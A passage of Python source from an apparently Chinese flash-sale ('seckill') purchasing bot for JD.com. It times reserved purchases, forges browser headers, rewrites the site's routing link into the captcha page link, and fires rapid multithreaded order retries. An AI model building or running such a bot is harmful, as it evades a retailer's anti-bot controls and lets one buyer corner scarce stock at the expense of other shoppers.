'token': token, 'pru': '' } return data def exec_seckill(self, sku_id, server_buy_time=int(time.time()), retry=4, interval=4, num=1, fast_mode=True): """立即抢购 抢购商品的下单流程与普通商品不同,不支持加入购物车,可能需要提前预约,主要执行流程如下: 1. 访问商品的抢购链接 2. 访问抢购订单结算页面(好像可以省略这步,待测试) 3. 
提交抢购(秒杀)订单 :param sku_id: 商品id :param server_buy_time: 商品指定抢购时间 :param retry: 抢购重复执行次数,可选参数,默认4次 :param interval: 抢购执行间隔,可选参数,默认4秒 :param num: 购买数量,可选参数,默认1个 :param fast_mode: 快速模式:略过访问抢购订单结算页面这一步骤,默认为 True :return: 抢购结果 True/False """ for count in range(1, retry + 1): logger.info('第[%s/%s]次尝试抢购商品:%s', count, retry, sku_id) if not fast_mode: # 访问抢购订单结算页面 self.request_info['request_seckill_checkout_page_request'](sku_id, num) if self.request_info['submit_seckill_order_request'](sku_id, server_buy_time, num): return True else: logger.info('休息%ss', interval) time.sleep(interval) else: logger.info('执行结束,抢购%s失败!', sku_id) return False @check_login def exec_seckill_by_time(self, config): """预约抢购 """ if not config: raise AsstException('初始化配置为空!') self.config = config # 兼容正常流程:开抢前清空购物车 self.clear_cart() items_dict = parse_sku_id(sku_ids=config.sku_id) if self.use_new: server_buy_time, realy_buy_time = self.new_init_seckill_request_method(config.fast_mode, config.is_risk_control) else: # 1.提前初始化预约抢购流程请求信息、方法 server_buy_time, realy_buy_time = self.init_seckill_request_method(config.fast_mode, config.is_risk_control) # 兼容正常流程:初始化正常下单流程请求信息、方法 self.init_default_order_request_method(config.fast_mode, config.is_risk_control) Timer.setSystemTime() # 使用多线程需要从倒计时前开始,后续流程都使用多线程执行 if self.use_new: get_confirm_order_page_request = self.request_info['get_confirm_order_page_request'] submit_order_request = self.request_info['submit_order_request'] def start_func(): # 订单请求页面 for sku_id in items_dict: logger.info('开始抢购商品:%s', sku_id) submit_data = get_confirm_order_page_request(sku_id, server_buy_time) if submit_data is not None: retry = config.retry interval = config.interval for count in range(1, retry + 1): logger.info('第[%s/%s]次尝试提交订单', count, retry) with self.sem: # 下单请求 if submit_order_request(submit_data, count): break logger.info('休息%ss', interval) time.sleep(interval) else: logger.info('执行结束,提交订单失败!') continue else: return None else: def start_func(): # 使用协程/多线程从执行开始 # 3.执行 for sku_id in items_dict: logger.info('开始抢购商品:%s', sku_id) # 获取抢购链接 resp = self.request_seckill_url(sku_id, server_buy_time) if resp is not None: if resp == 'pass': pass elif resp.status == 302: location = resp.headers['location'] logger.info('访问商品抢购链接请求,重定向地址:%s', location) if 'gate.action' in location: # 此处转入正常购物车下单流程 add_cart_request = self.request_info['add_cart_request'] payload = { 'pid': sku_id, 'pcount': config.num, 'ptype': 1, } add_cart_request(payload) # 获取订单结算页面信息 self.get_checkout_page_detail() retry = config.retry interval = config.interval for count in range(1, retry + 1): logger.info('第[%s/%s]次尝试提交订单', count, retry) with self.sem: if self.submit_order(): break logger.info('休息%ss', interval) time.sleep(interval) else: logger.info('执行结束,提交订单失败!') continue # 开始抢购 self.exec_seckill(sku_id, server_buy_time, config.retry, config.interval, int(items_dict[sku_id]), config.fast_mode) self.start_func = start_func # 2.倒计时 logger.info('准备抢购商品:%s', list(items_dict.keys())) Timer(buy_time=realy_buy_time, sleep_interval=config.sleep_interval, fast_sleep_interval=config.fast_sleep_interval, is_sync=False, assistant=self).start() if self.config.fast_mode: self.close_now() def new_parse_item_detail_page(self, sku_id, html): match = re.search(r'"zzz":\"(.*)\"', html) if not match: return False zzz = match.group(1) if zzz is None: return False self.item_zzz[sku_id] = zzz area_id_list = list(map(lambda x: x.strip(), re.split('_|-', self.area_id))) area_url = '' if len(area_id_list) > 2: area_url = area_id_list[0] + '-' + area_id_list[1] + 
'-' + area_id_list[2] item_url_param = 'sceneval=2&bid=&scene=jd&isCanEdit=1&EncryptInfo=&Token=&type=0&lg=0&supm=0&locationid=' + area_url + '&favorablerate=94' self.item_url_param[sku_id] = item_url_param return True def parse_item_detail_page(self, sku_id, page): match = re.search(r'cat: \[(.*?)\]', page.text) cat = match.group(1) if not cat: return False self.item_cat[sku_id] = cat match = re.search(r'venderId:(\d*?),', page.text) vender_id = match.group(1) self.item_vender_ids[sku_id] = vender_id match = re.search(r'paramJson:( ?)\'(\{.*\})\'', page.text) param_json = match.group(1) if not param_json or param_json == '' or param_json == ' ': param_json = match.group(2) if not param_json: param_json = '' self.param_json[sku_id] = param_json match = re.search(r'specialAttrs:( ?)(\[.*\])', page.text) special_attrs_str = match.group(1) if not special_attrs_str or special_attrs_str == '' or special_attrs_str == ' ': special_attrs_str = match.group(2) if special_attrs_str: special_attrs = json.loads(special_attrs_str) else: special_attrs = [] self.special_attrs[sku_id] = special_attrs return True def new_init_yuyue_buy_time(self, sku_id=None, html=None): config = self.config logger.info('初始化预约抢购时间') # 处理时间 server_buy_datetime = None if config.sku_buy_time: # 根据配置初始化 server_buy_datetime = datetime.strptime(config.sku_buy_time, "%Y-%m-%d %H:%M:%S.%f") else: # 自动获取 match = re.search(r'"yuyue":({.*})', html) if match: yuyue = match.group(1) if yuyue: yuyue_json = parse_json(yuyue) buy_start_time = yuyue_json['qiangStime'] if buy_start_time: buy_end_time = yuyue_json['qiangEtime'] server_buy_datetime = datetime.strptime(buy_start_time, "%Y-%m-%d %H:%M:%S") logger.info('商品%s预约抢购,开始时间:%s,结束时间:%s', sku_id, buy_start_time, buy_end_time) else: logger.debug(f"响应数据:{html}") logger.info("商品%s无法获取预约抢购时间,请重新设置sku_id", sku_id) exit(-1) else: logger.info("商品%s不是 预约抢购商品 或 未开始预约,请重新设置sku_id", sku_id) exit(-1) return int(time.mktime(server_buy_datetime.timetuple())), ( server_buy_datetime + timedelta(milliseconds=-config.buy_time_offset)).strftime( "%Y-%m-%d %H:%M:%S.%f") def init_yuyue_buy_time(self, sku_id=None, header=None, payload=None): if header is None: header = dict() config = self.config logger.info('初始化预约抢购时间') # 处理时间 server_buy_datetime = None if config.sku_buy_time: # 根据配置初始化 server_buy_datetime = datetime.strptime(config.sku_buy_time, "%Y-%m-%d %H:%M:%S.%f") else: # 自动初始化 header['Host'] = 'itemko.jd.com' header['Referer'] = 'https://item.jd.com/' resp = http_util.send_http_request(self.socket_client, url='https://item-soa.jd.com/getWareBusiness', method='GET', headers=header, params=payload, cookies=self.get_cookies_str_by_domain_or_path( 'item-soa.jd.com')) resp_data = resp.body resp_json = parse_json(resp_data) yuyue_info = resp_json.get('yuyueInfo') if yuyue_info: buy_time = yuyue_info.get('buyTime') if buy_time: buy_time_list = re.findall(r'\d{4}-\d{1,2}-\d{1,2} \d{1,2}:\d{1,2}', buy_time.strip()) if buy_time_list and len(buy_time_list) == 2: buy_start_time = buy_time_list[0] buy_end_time = buy_time_list[1] server_buy_datetime = datetime.strptime(buy_start_time, "%Y-%m-%d %H:%M") logger.info('商品%s预约抢购,开始时间:%s,结束时间:%s', sku_id, buy_start_time, buy_end_time) else: if resp_data: logger.info(f"响应数据:{resp_data}") logger.info("商品%s无法获取预约抢购时间,请重新设置sku_id", sku_id) exit(-1) else: if resp_data: logger.info(f"响应数据:{resp_data}") logger.info("商品%s无法获取预约抢购时间,请重新设置sku_id", sku_id) exit(-1) else: logger.info("商品%s不是 预约抢购商品 或 未开始预约,请重新设置sku_id", sku_id) exit(-1) return 
int(time.mktime(server_buy_datetime.timetuple())), ( server_buy_datetime + timedelta(milliseconds=-config.buy_time_offset)).strftime( "%Y-%m-%d %H:%M:%S.%f") def init_seckill_request_method(self, fast_mode, is_risk_control): # 提前初始化请求信息、方法 # self.get_and_update_cookies_str() config = self.config sku_id = config.sku_id area_id = parse_area_id(self.area_id) cat = self.item_cat.get(sku_id) retry_count = 0 while not cat: retry_count += 1 logger.info('第 %s 次获取商品页信息', retry_count) page = self._get_item_detail_page(sku_id) if not self.parse_item_detail_page(sku_id, page): if retry_count > 10: logger.error('无法获取cat,超出重试次数,抢购停止') exit(-1) else: logger.error('第 %s 次获取商品页信息失败:%s', page) time.sleep(1) continue else: cat = self.item_cat.get(sku_id) vender_id = self.item_vender_ids.get(sku_id) param_json = self.param_json.get(sku_id) special_attrs = self.special_attrs.get(sku_id) # 初始化预约抢购时间 server_buy_time, realy_buy_time = self.init_yuyue_buy_time(sku_id, self.headers.copy(), { # 'callback': 'jQuery{}'.format(random.randint(1000000, 9999999)), 'skuId': sku_id, 'cat': cat, 'area': area_id, 'shopId': vender_id, 'venderId': vender_id, 'paramJson': param_json, 'num': 1, }) # 初始化获取商品抢购链接请求方法 get_sku_seckill_url_request_headers = self.headers.copy() if fast_mode: get_sku_seckill_url_request_headers['Host'] = 'itemko.jd.com' if 'isKO' in special_attrs: def get_sku_seckill_url_request(sku_id, server_buy_time=int(time.time())): logger.info('获取抢购链接') payload = { # 'callback': 'jQuery{}'.format(random.randint(1000000, 9999999)), 'skuId': sku_id, 'from': 'pc', '_': str(server_buy_time * 1000), } get_sku_seckill_url_request_headers['Referer'] = f'https://item.jd.com/{sku_id}.html' retry_interval = config.retry_interval retry_count = 0 while not self.seckill_url.get(sku_id): if retry_count >= 10: logger.error("抢购链接获取失败,终止抢购!") exit(-1) try: resp = http_util.send_http_request(self.socket_client, url='https://itemko.jd.com/itemShowBtn', method='GET', headers=get_sku_seckill_url_request_headers, params=payload , cookies=self.get_cookies_str_by_domain_or_path( 'itemko.jd.com')) resp_data = resp.body resp_json = parse_json(resp_data) if resp_json.get('url'): # https://divide.jd.com/user_routing?skuId=8654289&sn=c3f4ececd8461f0e4d7267e96a91e0e0&from=pc router_url = 'https:' + resp_json.get('url') # https://marathon.jd.com/captcha.html?skuId=8654289&sn=c3f4ececd8461f0e4d7267e96a91e0e0&from=pc seckill_url = router_url.replace('divide', 'marathon').replace('user_routing', 'captcha.html') logger.info("抢购链接获取成功: %s", seckill_url) return seckill_url else: retry_count += 1 if resp_data: logger.info(f"响应数据:{resp_data}") logger.info("商品%s第%s次获取抢购链接失败,链接为空,%s秒后重试", sku_id, retry_count, retry_interval) time.sleep(retry_interval) except Exception as e: retry_count += 1 logger.error("异常信息:%s", e) logger.info("商品%s第%s次获取抢购链接失败,%s秒后重试", sku_id, retry_count, retry_interval) time.sleep(retry_interval) else: def get_sku_seckill_url_request(sku_id, server_buy_time=int(time.time())): logger.info('获取抢购链接') payload = { # 'callback': 'jQuery{}'.format(random.randint(1000000, 9999999)), 'skuId': sku_id, 'cat': cat, 'area': area_id, 'shopId': vender_id, 'venderId': vender_id, 'paramJson': param_json, 'num': 1, } get_sku_seckill_url_request_headers['Referer'] = 'https://item.jd.com/' retry_interval = config.retry_interval retry_count = 0 while not self.seckill_url.get(sku_id): if retry_count >= 10: logger.error("抢购链接获取失败,终止抢购!") exit(-1) try: resp = http_util.send_http_request(self.socket_client, url='https://item-soa.jd.com/getWareBusiness', 
method='GET', headers=get_sku_seckill_url_request_headers, params=payload, cookies=self.get_cookies_str_by_domain_or_path( 'item-soa.jd.com')) resp_data = resp.body resp_json = parse_json(resp_data) yuyue_info = resp_json.get('yuyueInfo') if yuyue_info: # https://divide.jd.com/user_routing?skuId=8654289&sn=c3f4ececd8461f0e4d7267e96a91e0e0&from=pc url = yuyue_info.get('url') if url: if 'toYuyue.action' in url: retry_count += 1 logger.info("商品%s正在预约中,暂未开始抢购,开始第%s次重试", sku_id, retry_count) continue router_url = 'https:' + url # https://marathon.jd.com/captcha.html?skuId=8654289&sn=c3f4ececd8461f0e4d7267e96a91e0e0&from=pc seckill_url = router_url.replace('divide', 'marathon').replace('user_routing', 'captcha.html') logger.info("抢购链接获取成功: %s", seckill_url) return seckill_url else: retry_count += 1 if resp_data: logger.info(f"响应数据:{resp_data}") logger.info("商品%s第%s次获取抢购链接失败,链接为空,%s秒后重试", sku_id, retry_count, retry_interval) time.sleep(retry_interval) else: if resp_data: logger.info(f"响应数据:{resp_data}") logger.info("商品%s不是 预约抢购商品 或 未开始预约,本次抢购结束", sku_id) exit(-1) except Exception as e: retry_count += 1 logger.error("异常信息:%s", e) logger.info("商品%s第%s次获取抢购链接失败,%s秒后重试", sku_id, retry_count, retry_interval) time.sleep(retry_interval) return None else: def get_sku_seckill_url_request(sku_id, server_buy_time=int(time.time())): url = 'https://itemko.jd.com/itemShowBtn' payload = { 'callback': 'jQuery{}'.format(random.randint(1000000, 9999999)), 'skuId': sku_id, 'from': 'pc', '_': str(server_buy_time * 1000), } headers = { 'User-Agent': self.user_agent, 'Host': 'itemko.jd.com', 'Referer': 'https://item.jd.com/{}.html'.format(sku_id), } retry_interval = 0.2 retry_count = 0 while retry_count < 10: try: resp = self.sess.get(url=url, headers=headers, params=payload, timeout=(0.1, 0.08)) resp_json = parse_json(resp.text) if resp_json.get('url'): # https://divide.jd.com/user_routing?skuId=8654289&sn=c3f4ececd8461f0e4d7267e96a91e0e0&from=pc router_url = 'https:' + resp_json.get('url') # https://marathon.jd.com/captcha.html?skuId=8654289&sn=c3f4ececd8461f0e4d7267e96a91e0e0&from=pc seckill_url = router_url.replace('divide', 'marathon').replace('user_routing', 'captcha.html') logger.info("抢购链接获取成功: %s", seckill_url) return seckill_url else: retry_count += 1 if resp.text: logger.info(f"响应数据:{resp.text}") logger.info("商品%s第%s次获取抢购链接失败,%s秒后重试", sku_id, retry_count, retry_interval) time.sleep(retry_interval) except Exception as e: retry_count += 1 logger.info("异常信息:%s", e) logger.info("商品%s第%s次获取抢购链接失败,%s秒后重试", sku_id, retry_count, retry_interval) time.sleep(retry_interval) logger.error("抢购链接获取失败,终止抢购!") exit(-1) self.request_info['get_sku_seckill_url_request'] = get_sku_seckill_url_request # 初始化访问商品抢购链接请求方法(用于设置cookie等) request_sku_seckill_url_request_headers = self.headers.copy() if fast_mode: request_sku_seckill_url_request_headers['Host'] = 'marathon.jd.com' def request_sku_seckill_url_request(sku_id): logger.info('访问商品抢购链接请求') request_sku_seckill_url_request_headers['Referer'] = f'https://item.jd.com/{sku_id}.html' url = self.seckill_url.get(sku_id) is_pass = self.is_request_seckill_url.get(sku_id) if not is_pass: resp = http_util.send_http_request(self.socket_client, url=url, method='GET', headers=request_sku_seckill_url_request_headers, cookies=self.get_cookies_str_by_domain_or_path( 'marathon.jd.com')) # 从响应头中提取cookies并更新 cookie_util.merge_cookies_from_response(self.sess.cookies, resp, url) # self.get_and_update_cookies_str() self.is_request_seckill_url[sku_id] = 'pass' return resp else: return is_pass else: 
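            # Non fast_mode fallback for the same "visit the seckill URL" step: it goes
            # through the plain requests session (self.sess) instead of the pre-warmed raw
            # socket client, suppresses redirects and keeps the timeout very short so a
            # slow response cannot stall the purchase loop.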
def request_sku_seckill_url_request(sku_id): headers = { 'User-Agent': self.user_agent, 'Host': 'marathon.jd.com', 'Referer': 'https://item.jd.com/{}.html'.format(sku_id), } return self.sess.get(url=self.seckill_url.get(sku_id), headers=headers, allow_redirects=False, timeout=(0.1, 0.08)) self.request_info['request_sku_seckill_url_request'] = request_sku_seckill_url_request # 初始化访问抢购订单结算页面请求方法 request_seckill_checkout_page_request_headers = self.headers.copy() # if fast_mode and is_risk_control is False: if fast_mode: # request_seckill_checkout_page_request_headers['cookie'] = self.cookies_str request_seckill_checkout_page_request_headers['Host'] = 'marathon.jd.com' def request_seckill_checkout_page_request(sku_id, num): logger.info('抢购订单结算页面请求') url = 'https://marathon.jd.com/seckill/seckill.action' request_sku_seckill_url_request_headers['Referer'] = f'https://item.jd.com/{sku_id}.html' is_pass = self.is_seckill_checkout_page.get(sku_id) if not is_pass: resp = http_util.send_http_request(self.socket_client, url=url, method='GET', params={ 'skuId': sku_id, 'num': num, 'rid': int(time.time()) }, headers=request_seckill_checkout_page_request_headers, cookies=self.get_cookies_str_by_domain_or_path( 'marathon.jd.com')) logger.info(resp.body) # 从响应头中提取cookies并更新 cookie_util.merge_cookies_from_response(self.sess.cookies, resp, url) # self.get_and_update_cookies_str() self.is_seckill_checkout_page[sku_id] = True return resp else: return is_pass else: def request_seckill_checkout_page_request(sku_id, num): url = 'https://marathon.jd.com/seckill/seckill.action' payload = { 'skuId': sku_id, 'num': num, 'rid': int(time.time()) } headers = { 'User-Agent': self.user_agent, 'Host': 'marathon.jd.com', 'Referer': 'https://item.jd.com/{}.html'.format(sku_id), } self.sess.get(url=url, params=payload, headers=headers, timeout=(0.1, 0.08)) self.request_info['request_seckill_checkout_page_request'] = request_seckill_checkout_page_request # 初始化获取秒杀初始化信息请求方法(包括:地址,发票,token) get_seckill_init_info_request_headers = self.headers.copy() if fast_mode: # get_seckill_init_info_request_headers['cookie'] = self.cookies_str get_seckill_init_info_request_headers['Host'] = 'marathon.jd.com' def get_seckill_init_info_request(sku_id, num=1): url = 'https://marathon.jd.com/seckillnew/orderService/pc/init.action' resp = http_util.send_http_request(self.socket_client, url=url, method='POST', data={ 'sku': sku_id, 'num': num, 'isModifyAddress': 'false', }, headers=get_seckill_init_info_request_headers, cookies=self.get_cookies_str_by_domain_or_path('marathon.jd.com')) # logger.info(resp.body) # 从响应头中提取cookies并更新 cookie_util.merge_cookies_from_response(self.sess.cookies, resp, url) if resp.status == 302: return resp.headers['location'] # self.get_and_update_cookies_str() return resp.body else: def get_seckill_init_info_request(sku_id, num=1): url = 'https://marathon.jd.com/seckillnew/orderService/pc/init.action' data = { 'sku': sku_id, 'num': num, 'isModifyAddress': 'false', } headers = { 'User-Agent': self.user_agent, 'Host': 'marathon.jd.com', } return self.sess.post(url=url, data=data, headers=headers).text self.request_info['get_seckill_init_info_request'] = get_seckill_init_info_request # 初始化提交抢购(秒杀)订单请求方法 submit_seckill_order_request_headers = self.headers.copy() if fast_mode: # submit_seckill_order_request_headers['cookie'] = cookie_str submit_seckill_order_request_headers['Host'] = 'marathon.jd.com' def submit_seckill_order_request(sku_id=None, server_buy_time=int(time.time()), num=1): logger.info('提交抢购(秒杀)订单请求') url = 
'https://marathon.jd.com/seckillnew/orderService/pc/submitOrder.action' submit_seckill_order_request_headers[ 'Referer'] = f'https://marathon.jd.com/seckill/seckill.action?skuId={sku_id}&num={num}&rid={server_buy_time} ' if not self.seckill_order_data.get(sku_id): self.seckill_order_data[sku_id] = self._gen_seckill_order_data(sku_id, num) retry_interval = 0.1 retry_count = 0 while retry_count < 10: resp_json = None try: resp = http_util.send_http_request(self.socket_client, url=url, method='POST', params={'skuId': sku_id}, data=self.seckill_order_data.get(sku_id), headers=submit_seckill_order_request_headers, cookies=self.get_cookies_str_by_domain_or_path( 'marathon.jd.com')) body = resp.body logger.info(body) resp_json = parse_json(body) except Exception as e: logger.error('秒杀请求出错:%s', str(e)) retry_count += 1 time.sleep(retry_interval) # 返回信息 # 抢购失败: # {'errorMessage': '很遗憾没有抢到,再接再厉哦。', 'orderId': 0, 'resultCode': 60074, 'skuId': 0, 'success': False} # {'errorMessage': '抱歉,您提交过快,请稍后再提交订单!', 'orderId': 0, 'resultCode': 60017, 'skuId': 0, 'success': False} # {'errorMessage': '系统正在开小差,请重试~~', 'orderId': 0, 'resultCode': 90013, 'skuId': 0, 'success': False} # 抢购成功: # {"appUrl":"xxxxx","orderId":820227xxxxx,"pcUrl":"xxxxx","resultCode":0,"skuId":0,"success":true,"totalMoney":"xxxxx"} if resp_json.get('success'): order_id = resp_json.get('orderId') total_money = resp_json.get('totalMoney') pay_url = 'https:' + resp_json.get('pcUrl') logger.info('抢购成功,订单号: %s, 总价: %s, 电脑端付款链接: %s', order_id, total_money, pay_url) return True else: logger.info('抢购失败,返回信息: %s', resp_json) retry_count += 1 time.sleep(retry_interval) return False else: def submit_seckill_order_request(sku_id, server_buy_time=int(time.time()), num=1): url = 'https://marathon.jd.com/seckillnew/orderService/pc/submitOrder.action' payload = { 'skuId': sku_id, } if not self.seckill_order_data.get(sku_id): self.seckill_order_data[sku_id] = self._gen_seckill_order_data(sku_id, num) headers = { 'User-Agent': self.user_agent, 'Host': 'marathon.jd.com', 'Referer': 'https://marathon.jd.com/seckill/seckill.action?skuId={0}&num={1}&rid={2}'.format( sku_id, num, server_buy_time), } retry_interval = 0.1 retry_count = 0 while retry_count < 10: resp_json = None try: resp = self.sess.post(url=url, headers=headers, params=payload, data=self.seckill_order_data.get(sku_id), timeout=(0.1, 0.08)) logger.info(resp.text) resp_json = parse_json(resp.text) except Exception as e: logger.error('秒杀请求出错:%s', str(e)) retry_count += 1 time.sleep(retry_interval) # 返回信息 # 抢购失败: # {'errorMessage': '很遗憾没有抢到,再接再厉哦。', 'orderId': 0, 'resultCode': 60074, 'skuId': 0, 'success': False} # {'errorMessage': '抱歉,您提交过快,请稍后再提交订单!', 'orderId': 0, 'resultCode': 60017, 'skuId': 0, 'success': False} # {'errorMessage': '系统正在开小差,请重试~~', 'orderId': 0, 'resultCode': 90013, 'skuId': 0, 'success': False} # 抢购成功: # {"appUrl":"xxxxx","orderId":820227xxxxx,"pcUrl":"xxxxx","resultCode":0,"skuId":0,"success":true,"totalMoney":"xxxxx"} if resp_json.get('success'): order_id = resp_json.get('orderId') total_money = resp_json.get('totalMoney') pay_url = 'https:' + resp_json.get('pcUrl') logger.info('抢购成功,订单号: %s, 总价: %s, 电脑端付款链接: %s', order_id, total_money, pay_url) return True else: logger.info('抢购失败,返回信息: %s', resp_json) retry_count += 1 time.sleep(retry_interval) return False self.request_info['submit_seckill_order_request'] = submit_seckill_order_request return server_buy_time, realy_buy_time def new_init_seckill_request_method(self, fast_mode, is_risk_control): # 提前初始化请求信息、方法 # 
self.get_and_update_cookies_str() config = self.config sku_id = config.sku_id zzz = self.item_zzz.get(sku_id) retry_count = 0 item_page_resp = self.new_get_item_detail_page(sku_id) item_page = item_page_resp.text while zzz is None: retry_count += 1 logger.info('加载订单') if not self.new_parse_item_detail_page(sku_id, item_page): if retry_count > 10: logger.error('无法获取zzz,超出重试次数,抢购停止') exit(-1) else: logger.error('第 %s 次加载订单失败', retry_count) retry_count += 1 time.sleep(1) if item_page_resp.status_code != requests.codes.OK or not item_page: item_page_resp = self.new_get_item_detail_page(sku_id) item_page = item_page_resp.text continue else: zzz = self.item_zzz.get(sku_id) area_id = parse_area_id(self.area_id) vender_id = self.item_vender_ids.get(sku_id) param_json = self.param_json.get(sku_id) special_attrs = self.special_attrs.get(sku_id) # 初始化预约抢购时间 server_buy_time, realy_buy_time = self.new_init_yuyue_buy_time(sku_id, item_page) if server_buy_time > int(time.time()): hasYuyue_match = re.search(r'"hasYuyue":"(.*)"', item_page) if hasYuyue_match: hasYuyue = hasYuyue_match.group(1) if hasYuyue == '0' or hasYuyue == 0: self.new_reserve(sku_id) elif hasYuyue == '1' or hasYuyue == 1: logger.info('商品已预约,跳过自动预约') else: logger.info('商品已开售,跳过自动预约') # 初始化加载订单请求方法 if fast_mode: get_confirm_order_page_request_headers = self.headers.copy() get_confirm_order_page_request_headers['Host'] = 'wq.jd.com' get_confirm_order_page_request_headers['dnt'] = '1' get_confirm_order_page_request_headers['referer'] = 'https://item.m.jd.com/' get_confirm_order_page_request_headers['sec-fetch-dest'] = 'document' get_confirm_order_page_request_headers['sec-fetch-mode'] = 'navigate' get_confirm_order_page_request_headers['sec-fetch-site'] = 'same-site' get_confirm_order_page_request_headers['sec-fetch-user'] = '?1' get_confirm_order_page_request_headers['upgrade-insecure-requests'] = '1' get_confirm_order_promise_uuid_headers = self.headers.copy() get_confirm_order_headers = self.headers.copy() def parsing_submit_page_data(html): data = dict() page_data = nested_parser('{', '}', html, 'token2') if '"errId":"0"' not in page_data: logger.error('加载订单页数据失败,响应数据:%s', page_data) raise AsstException('加载订单页数据失败') if isinstance(page_data, str): token2search = re.search(r'"token2":\"(.*)\"', page_data) if token2search: data['token2'] = token2search.group(1) skulistsearch = re.search(r'"skulist":\"(.*)\"', page_data) if skulistsearch: data['skulist'] = skulistsearch.group(1) traceIdsearch = re.search(r'"traceId":\"(.*)\"', page_data) if traceIdsearch: data['traceid'] = traceIdsearch.group(1) mainSkusearch = re.search(r'"promotion":({([^}])*})', page_data) if mainSkusearch: data['discountPrice'] = json.loads(mainSkusearch.group(1))['discountPrice'] cidsearch = re.search(r'"cid":\"(.*)\"', page_data) if cidsearch: data['cid'] = cidsearch.group(1).split('_')[2] sucPageTypesearch = re.search(r'"sucPageType":\"(.*)\"', page_data) if sucPageTypesearch: data['sucPageType'] = sucPageTypesearch.group(1) vender_cart = nested_parser('[', ']', page_data, '"jdShipment":') if isinstance(vender_cart, str): venderIdsearch = re.search(r'"venderId":\"(.*)\"', vender_cart) if venderIdsearch: data['venderId'] = venderIdsearch.group(1) jdShipmentsearch = re.search(r'"jdShipment":\"(.*)\"', vender_cart) if jdShipmentsearch: data['jdShipment'] = jdShipmentsearch.group(1) shipment_str = nested_inner_parser('[', ']', vender_cart, '"promiseSendPay":') if isinstance(shipment_str, str): shipment = json.loads(shipment_str) if shipment: data['shipment'] = shipment 
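                # At this point `data` holds everything later steps need from the confirm-order
                # page: token2 / skulist / traceid / discountPrice / cid / sucPageType plus the
                # vendor block (venderId, jdShipment) and the selected shipment entries; these
                # are serialised further down into the query string that submit_order_request sends.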
return data def parse_promise_uuid(resp_text): resp_json = nested_parser('{', '}', resp_text, "errId") if isinstance(resp_json, str): ship_effect = json.loads(resp_json) promise_uuid = ship_effect['pickshipment']['promiseUuid'] elif isinstance(resp_json, list): ship_effect = json.loads(resp_json[0]) promise_uuid = ship_effect['pickshipment']['promiseUuid'] else: promise_uuid = '' return promise_uuid def get_confirm_order_page_request(sku_id, server_buy_time=int(time.time())): logger.info('加载订单页面请求') jxsid = str(int(time.time() * 1000)) + str(random.random())[2:7] url = 'https://wq.jd.com/deal/confirmorder/main?jxsid=' + jxsid sceneval = '2' referer_url = f'https://item.m.jd.com/product/{sku_id}.html?sceneval={sceneval}&jxsid={jxsid}' commlist = f'{sku_id},,1,{sku_id},1,0,0' confirm_order_page_params = f'{self.item_url_param.get(sku_id)}&commlist={commlist}' \ f'&wdref={parse.quote(referer_url, safe='')}' referer = f'{referer_url}&{confirm_order_page_params}' get_confirm_order_page_request_headers['Referer'] = referer_url get_confirm_order_promise_uuid_headers['Referer'] = referer if not self.get_submit_referer.get(sku_id): self.get_submit_referer[sku_id] = referer self.sess.cookies.set('_modc', zzz) retry_interval = config.retry_interval retry_count = 0 submit_page_data = self.get_submit_page_data.get(sku_id) while not submit_page_data: if retry_count >= 10: logger.error("加载订单页面请求失败,终止抢购!") exit(-1) try: resp = http_util.send_http_request(self.socket_client, url=url, method='GET', headers=get_confirm_order_page_request_headers, params=confirm_order_page_params, cookies=self.get_cookies_str_by_domain_or_path('wq.jd.com')) resp_data = resp.body if resp_data.startswith("<!DOCTYPE html>"): submit_page_data = self.get_submit_page_data.get(sku_id) if not submit_page_data: submit_page_data = parsing_submit_page_data(resp_data) # 从响应头中提取cookies并更新 cookie_util.merge_cookies_from_response(self.sess.cookies, resp, url) self.get_submit_page_data[sku_id] = submit_page_data break except Exception as e: logger.error("异常信息:%s", e) retry_count += 1 logger.info("商品%s第%s次加载订单页面请求失败,%s秒后重试", sku_id, retry_count, retry_interval) time.sleep(retry_interval) promise_uuid_retry_interval = 0.02 promise_uuid = self.get_promiseUuid.get(sku_id) if not promise_uuid: with self.sem: # 订单页参数请求 if not self.get_promiseUuid.get(sku_id): i = 0 while i < 8: try: shipeffect_params = { 'reg': 1 , 'action': 1 , 'reset': 1 , 'callback': f'preShipeffectCb{self.letterMap[i + 1]}' , 'r': random.random() , 'sceneval': 2 , 'traceid': submit_page_data.get('traceid') } logger.info('加载订单页参数请求') url = 'https://wq.jd.com/deal/mship/shipeffect' resp = http_util.send_http_request(self.socket_client, url=url, method='GET', headers=get_confirm_order_promise_uuid_headers, cookies=self.get_cookies_str_by_domain_or_path( 'wq.jd.com'), params=shipeffect_params) promise_uuid = parse_promise_uuid(resp.body) if promise_uuid is not None: self.get_promiseUuid[sku_id] = promise_uuid break # 从响应头中提取cookies并更新 # cookie_util.merge_cookies_from_response(self.sess.cookies, resp, url) # self.get_and_update_cookies_str() except Exception as e: logger.error("异常信息:%s", e) i += 1 logger.info("商品%s第%s次订单页参数请求失败,%s秒后重试", sku_id, i, promise_uuid_retry_interval) time.sleep(promise_uuid_retry_interval) submit_data = self.get_submit_data.get(sku_id) if not submit_data: with self.sem: # 订单参数处理 if not self.get_submit_data.get(sku_id): discountPrice = submit_page_data.pop('discountPrice', '') cid = submit_page_data.pop('cid', '') shipment = submit_page_data.pop('shipment', 
'') venderId = submit_page_data.pop('venderId', '') jdShipment = submit_page_data.pop('jdShipment', '') params_list = [] params_list.append( 'paytype=0&paychannel=1&action=1&reg=1&type=0&gpolicy=&platprice=0&pick=&savepayship=0&sceneval=2&setdefcoupon=0') params_list.append('&tuanfull=') params_list.append(submit_page_data.pop('sucPageType', '')) for key, value in submit_page_data.items(): params_list.append(f'&{key}={value}') params_list.append(f'&valuableskus={sku_id},{config.num},{discountPrice},{cid}') params_list.append(f'&commlist={commlist}') params_list.append('&dpid=&scan_orig=') # params_list.append(f'&dpid={?}') # params_list.append(f'&scan_orig={?}') # 处理shipment shipmentData = None shipName = None shipType = '0' for i, data in enumerate(shipment): shipType = data.get('type') if shipType == '0': shipmentData = data shipName = ["jd311", "jdjzd", "jd411"][i] break elif shipType == '1' \ or shipType == '2': shipmentData = data shipName = "shipsop" break elif shipType == '3' \ or shipType == '6': # var _ = new K.default(e,n,t,h,i); # _.supported ? u[_.name] = _ : p[_.name] = _; break elif shipType == '4': # "1" == n.selected && "0" == e.jdShipment && (e.isTenVideo = !0, # h.isTenVideo = !0, # h.fpbarTipLoc = e.isloc, # h.fpbarTipTen = !e.isloc); break elif shipType == '5': # var g, y, b = !1; # if (ce.supSopJd = !0, # e.smallProducts.length > 0) # (0, # D.default)(g = oe.smallShipments).call(g, function(a) { # var r = new a(e,n,t,h,i); # r.supported ? u[r.name] = r : 